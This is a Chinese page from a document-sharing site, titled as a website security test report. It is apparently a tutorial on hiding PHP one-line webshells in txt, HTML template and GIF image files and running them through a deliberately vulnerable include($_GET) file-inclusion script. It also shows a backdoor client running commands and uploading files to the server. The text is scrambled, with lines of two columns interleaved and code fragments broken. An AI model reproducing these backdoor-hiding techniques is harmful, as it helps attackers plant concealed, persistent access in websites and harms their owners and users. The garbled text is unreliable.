网站安全测试报告

2022-09-22 13:07:11   文档大全网     [ 字体: ] [ 阅读: ]

#文档大全网# 导语】以下是®文档大全网的小编为您整理的《网站安全测试报告》,欢迎阅读!
测试,报告,安全,网站
本文格式为Word版,下载可任意编辑

网站安全测试报告

理员是无法看出来的。

有了include函数来辅助帮忙我们就可以把PHP木马隐藏到诸如txthtml图片文件

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML图片里,其实把一句话木

等很多类型的文件里来了。因为txthtml图片文件这三种类型的文件最无论在论坛还是

马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看

文章系统里是最为常见的了,下面我们就依次来做测试。

这篇的篇测试报告吧。要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为

首先建立一PHP文件test.php文件内容为:

PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助

$test=$_GET[''''test''''];

PHP中的调用函数:includerequire等。

@include''''test/''''.$test;

我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用

?

include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐

Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随

蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL里用GET方式很难传

便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问

递参数,这就使得插入木马的性能得不到发挥。

localhost/test/test.php?test=../t.txt如果你看到t.txt的内容就证明Ok了,然后把在

Include函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如

lanker微型PHP后门客户端木马地址添入localhost/test/test.php?test=../t.txt密码里

PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似

添入cmd就可以了,执行返回的结果都可以看到。

的语句来插入到PHP文件中。然后把木马隐藏到图片HTML文件里,可以说隐蔽性就更高了。

对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行

如在PHPWIND论坛里插入下面的语句:<‘’?@includeinclud/.$PHPWIND_ROOT;?>一般管

1 2


本文格式为Word版,下载可任意编辑

而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框,如:然后使用方法同上。

执行的返回结果一般都可以查看源文件看到。如使用查看本程序目录功能。查看源文件内容

为我可以得到目录为C:\Uniserver2_7s\\test

下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接

对一个图片进行编辑,把插入到图片末尾

经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入

我们查看PHP环境变量返回的是结果是原图片

这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不

到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了

命令我们执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点

是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪

造一个假的图片文件吧。

到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。行文仓促,如有不妥

之处,请指出!

2 2


本文来源:https://www.wddqxz.cn/11cf2a15eb7101f69e3143323968011ca300f7cc.html

相关推荐